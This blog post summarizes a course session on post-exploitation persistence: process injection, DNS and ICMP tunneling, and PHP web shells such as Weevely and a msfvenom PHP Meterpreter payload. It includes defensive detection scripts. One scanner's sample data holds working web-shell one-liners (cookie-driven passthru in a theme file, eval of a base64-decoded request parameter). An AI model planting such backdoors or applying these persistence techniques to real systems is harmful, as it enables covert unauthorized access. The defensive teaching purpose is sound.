DEV Community

Timothy Imanuel

Week 10 & 11

Maintaining Access: Post-Exploitation Foundations (Session 10 Summary)

This summary covers the primary theoretical concepts and definitions from Session 10 on Maintaining Access within a structured security assessment infrastructure.


1. Why Maintain Access?

Once initial access to a target network is achieved, establishing a persistent foothold is valued for several key reasons:

  • Efficiency: Avoids needing to repeat the initial exploitation phase ("reinventing the wheel").
  • Configuration Resilience: Ensures continuity of access if the original entry vector or vulnerability is patched or fixed by administrators.
  • System Hardening Adjustments: Allows analysts to continue testing even if basic perimeter firewalls or filters are updated.
  • Operational Considerations: Saves significant resource time during prolonged penetration testing engagements while always remaining within legal and ethical boundaries.

2. Core Persistence Frameworks

Security testing architectures classify persistence mechanisms into three primary methods: OS Backdoors, Protocol Tunneling, and Web-Based Backdoors.

A. Operating System (OS) Backdoors

An OS backdoor provides a method to access a host environment while completely bypassing standard authentication pathways to remain undetected.

  • Process Injection (Cymothoa): A utility designed to inject shellcode directly into the memory space of an existing, legitimate running system process (such as a system daemon). By attaching to a running Process ID (PID), the injected code runs in the privilege context of that process without spawning a separate, highly visible standalone process.
  • Advanced Frameworks: Platforms like Meterpreter or Intersect are applied to automate the management of local environment persistence.
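From the defender's side, injection into a running process leaves traces in that process's memory map. The following is an added example (not Cymothoa's code or any tool from the session): a small triage script that parses a Linux /proc/<pid>/maps listing and flags regions that are both writable and executable, or executable with no backing file. The listing below is constructed, not captured from a real host, and the rules are indicators for review rather than proof of injection, since JIT runtimes such as Java or browsers also create anonymous executable memory.

```python
"""Heuristic triage of a Linux /proc/<pid>/maps listing for memory that
looks like injected code. Added example for illustration; the sample
listing is constructed and the checks are review heuristics only."""

import re
from dataclasses import dataclass

# One line of /proc/<pid>/maps: address range, perms, offset, dev, inode, optional path.
MAPS_LINE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>[rwxps-]{4})\s+"
    r"[0-9a-f]+\s+\S+\s+\d+\s*(?P<path>.*)$"
)

# Constructed sample: an sshd-like process with two regions that warrant a look.
SAMPLE_MAPS = """\
55d0c3a00000-55d0c3a1c000 r--p 00000000 08:01 1835029 /usr/sbin/sshd
55d0c3a1c000-55d0c3b0e000 r-xp 0001c000 08:01 1835029 /usr/sbin/sshd
55d0c5b2f000-55d0c5b71000 rw-p 00000000 00:00 0       [heap]
7f3a1c000000-7f3a1c021000 rw-p 00000000 00:00 0
7f3a1d4f2000-7f3a1d4f3000 rwxp 00000000 00:00 0
7f3a1e200000-7f3a1e222000 r-xp 00000000 00:00 0
7ffd2c1e4000-7ffd2c205000 rw-p 00000000 00:00 0       [stack]
7ffd2c3a8000-7ffd2c3aa000 r-xp 00000000 00:00 0       [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0 [vsyscall]
"""


@dataclass
class Region:
    start: int
    end: int
    perms: str
    path: str


def parse_maps(text):
    """Parse maps output into Region objects, skipping lines that do not match."""
    regions = []
    for line in text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if m:
            regions.append(Region(int(m["start"], 16), int(m["end"], 16),
                                  m["perms"], m["path"].strip()))
    return regions


def suspicious_regions(regions):
    """Return (region, reason) pairs worth a closer look.

    Rule 1: writable + executable memory is unusual outside JIT runtimes.
    Rule 2: executable memory with no file behind it and no kernel pseudo-name
            ([vdso], [vsyscall]) is a classic sign of injected code."""
    findings = []
    for r in regions:
        executable = "x" in r.perms
        writable = "w" in r.perms
        if executable and writable:
            findings.append((r, "writable and executable mapping"))
        elif executable and r.path == "":
            findings.append((r, "executable mapping with no backing file"))
    return findings


if __name__ == "__main__":
    for region, reason in suspicious_regions(parse_maps(SAMPLE_MAPS)):
        print(f"{region.start:012x}-{region.end:012x} {region.perms}: {reason}")
```

On a live system the same function can be fed the contents of /proc/<pid>/maps for each PID; cross-checking a flagged region against the binary's expected sections, or dumping it for inspection, is the next step of the investigation.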

B. Protocol Tunneling

Tunneling refers to the practice of encapsulating one network protocol inside another network protocol to safely navigate past perimeter defenses.

  • Purpose: Its main objective is to bypass protocol-specific restrictions or egress rules established on the target network.
  • Common Transport Channels: Highly trusted, standard outbound channels are favored to mask traffic, including DNS, HTTP/HTTPS, and SSH.
  • Common Tunneling Tools:
    • dns2tcp and iodine (encapsulating raw data traffic inside standard DNS queries).
    • ptunnel (ICMP packet tunneling).
    • proxychains, socat, stunnel4, and netcat.
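Because DNS tunnels must push their payload through query names, they stand out in resolver logs as bursts of long, high-entropy labels under one domain, often with TXT or NULL record types. The following is an added example (not the code of dns2tcp, iodine or any other tool named above): a detector that groups queries by client and registered domain and flags groups with repeated encoded-looking labels. The log lines, the tunnel-example.test domain, and the four-field log format (timestamp, client, qtype, qname) are all constructed assumptions, not any particular resolver's output.

```python
"""Detect DNS-tunnel-like query patterns in a resolver query log.
Added example for illustration; the log format and sample lines are
constructed, and thresholds are starting points to tune per network."""

import math
from collections import Counter, defaultdict

# Constructed sample: one host browsing normally, one host emitting long
# hex-encoded labels under a single domain using TXT/NULL record types.
SAMPLE_LOG = """\
2024-05-01T10:00:01 10.0.0.12 A www.example.com
2024-05-01T10:00:02 10.0.0.12 AAAA www.example.com
2024-05-01T10:00:03 10.0.0.12 A cdn.example.net
2024-05-01T10:00:04 10.0.0.45 TXT 6a7b3f9c1d2e8f4a5b6c7d8e9f0a1b2c.t.tunnel-example.test
2024-05-01T10:00:04 10.0.0.45 TXT 0f1e2d3c4b5a69788796a5b4c3d2e1f0.t.tunnel-example.test
2024-05-01T10:00:05 10.0.0.45 NULL 9e8d7c6b5a4f3e2d1c0b9a8f7e6d5c4b.t.tunnel-example.test
2024-05-01T10:00:05 10.0.0.45 TXT a1b2c3d4e5f60718293a4b5c6d7e8f90.t.tunnel-example.test
2024-05-01T10:00:06 10.0.0.12 A mail.example.com
"""


def shannon_entropy(s):
    """Bits of entropy per character; encoded payloads score high, words low."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def analyse_dns_log(log_text, min_label_len=20, min_entropy=3.5, min_hits=3):
    """Group queries by (client, registered domain) and flag groups in which
    at least min_hits distinct subdomains carry long, high-entropy labels.
    The registered domain is approximated by the last two labels; a real
    deployment would use the public suffix list instead."""
    stats = defaultdict(lambda: {"queries": 0, "subdomains": set(),
                                 "encoded_labels": 0, "txt_null": 0})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines
        _ts, client, qtype, qname = parts
        labels = qname.rstrip(".").lower().split(".")
        if len(labels) < 3:
            continue  # bare domain, no subdomain to carry data
        base = ".".join(labels[-2:])
        sub_labels = labels[:-2]
        s = stats[(client, base)]
        s["queries"] += 1
        s["subdomains"].add(".".join(sub_labels))
        if any(len(lab) >= min_label_len and shannon_entropy(lab) >= min_entropy
               for lab in sub_labels):
            s["encoded_labels"] += 1
        if qtype in ("TXT", "NULL"):
            s["txt_null"] += 1

    alerts = []
    for (client, base), s in stats.items():
        if s["encoded_labels"] >= min_hits and len(s["subdomains"]) >= min_hits:
            alerts.append({"client": client, "domain": base,
                           "queries": s["queries"],
                           "unique_subdomains": len(s["subdomains"]),
                           "encoded_labels": s["encoded_labels"],
                           "txt_null_queries": s["txt_null"]})
    return alerts


if __name__ == "__main__":
    for alert in analyse_dns_log(SAMPLE_LOG):
        print(alert)
```

The entropy and length thresholds are deliberately conservative; content delivery networks and some mail security products also generate long machine-looking labels, so a production rule would pair this with an allowlist of known domains and a per-client volume baseline.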

C. Web-Based Backdoors

When the target infrastructure hosts web-based applications, testers can plant web shells as normal standalone scripts or inject minor payload logic directly into pre-existing source files (like themes or modules).

  • WeBaCoo (Web Backdoor Cookie): A stealthy web backdoor tool that uses the HTTP Cookie header to obfuscate command-and-control communication parameters, executing them via native PHP execution functions (system, shell_exec, exec, passthru, or popen).
  • Weevely: A tiny, highly optimized PHP web shell that acts as a stealthy terminal simulation tool, enabling filesystem browsing and remote command execution over standard web traffic vectors.
  • PHP Meterpreter: A payload module generated via msfvenom (php/meterpreter/reverse_tcp) that connects the web application process back to a handler waiting in Metasploit, opening an interactive post-exploitation session inside the web daemon runtime environment.
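All three web backdoors above share one trait that defenders can hunt for: request-controlled data (a cookie, query string or POST field) reaching a PHP execution function. The following is an added example (not the code of WeBaCoo, Weevely or Metasploit): a source scanner that walks PHP files for calls to the execution functions named above and reports any whose argument is built from a request superglobal, either directly or through a variable assigned from one. The file names and contents are constructed; the tainted-variable tracking is a simple same-file approximation, not a full data-flow analysis.

```python
"""Scan PHP source for request-controlled input reaching command execution.
Added example for illustration; sample files are constructed and the taint
tracking is a single-file approximation rather than a full analysis."""

import re

EXEC_FUNCS = ("system", "shell_exec", "exec", "passthru", "popen", "proc_open", "eval")
CALL_RE = re.compile(r"\b(?P<func>" + "|".join(EXEC_FUNCS) + r")\s*\(")
SUPERGLOBAL_RE = re.compile(r"\$_(GET|POST|COOKIE|REQUEST|SERVER|FILES)\b")
# "$name = <rhs>;"  (the (?!=) keeps "==" comparisons from matching)
ASSIGN_RE = re.compile(r"\$(?P<var>[A-Za-z_]\w*)\s*=(?!=)\s*(?P<rhs>[^;]*);")

# Constructed samples: an injected theme footer, a legitimate constant
# command, and a dropped file decoding a request parameter into eval().
SAMPLES = {
    "wp-content/themes/demo/footer.php": """<?php
$year = date('Y');
echo "<footer>&copy; $year Demo</footer>";
$k = $_COOKIE['wp_s'];
if (!empty($k)) {
    passthru($k);
}
""",
    "admin/status.php": """<?php
exec('/usr/bin/uptime', $out);
echo htmlspecialchars(implode("\\n", $out));
""",
    "uploads/cache.php": "<?php eval(base64_decode($_REQUEST['q'])); ?>",
}


def _call_argument(src, open_idx):
    """Return the text between the '(' at open_idx and its matching ')'."""
    depth = 0
    for i in range(open_idx, len(src)):
        if src[i] == "(":
            depth += 1
        elif src[i] == ")":
            depth -= 1
            if depth == 0:
                return src[open_idx + 1:i]
    return src[open_idx + 1:]  # unbalanced source; take the remainder


def tainted_variables(src):
    """Names of variables assigned (possibly via chains) from a superglobal."""
    tainted = set()
    changed = True
    while changed:
        changed = False
        for m in ASSIGN_RE.finditer(src):
            rhs = m["rhs"]
            from_taint = any(re.search(r"\$" + v + r"\b", rhs) for v in tainted)
            if (SUPERGLOBAL_RE.search(rhs) or from_taint) and m["var"] not in tainted:
                tainted.add(m["var"])
                changed = True
    return tainted


def scan_php(src, name="<input>"):
    """Return (file, line, function, reason) for each risky execution call."""
    findings = []
    tainted = tainted_variables(src)
    for m in CALL_RE.finditer(src):
        arg = _call_argument(src, m.end() - 1)
        line_no = src.count("\n", 0, m.start()) + 1
        if SUPERGLOBAL_RE.search(arg):
            findings.append((name, line_no, m["func"],
                             "argument built from a request superglobal"))
        else:
            used = [v for v in tainted if re.search(r"\$" + v + r"\b", arg)]
            if used:
                findings.append((name, line_no, m["func"],
                                 "argument uses tainted variable $" + used[0]))
    return findings


def scan_all(files):
    """Scan a {path: source} mapping and collect every finding."""
    findings = []
    for name, src in files.items():
        findings.extend(scan_php(src, name))
    return findings


if __name__ == "__main__":
    for f in scan_all(SAMPLES):
        print("%s:%d %s() - %s" % f)
```

The regex matcher will also fire on function names inside comments or strings, which is acceptable for a triage pass but means every hit needs a human look; pairing this with file integrity monitoring of theme and module directories catches the "inject minor payload logic into pre-existing files" case even when the call is obfuscated beyond what a pattern scanner sees.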
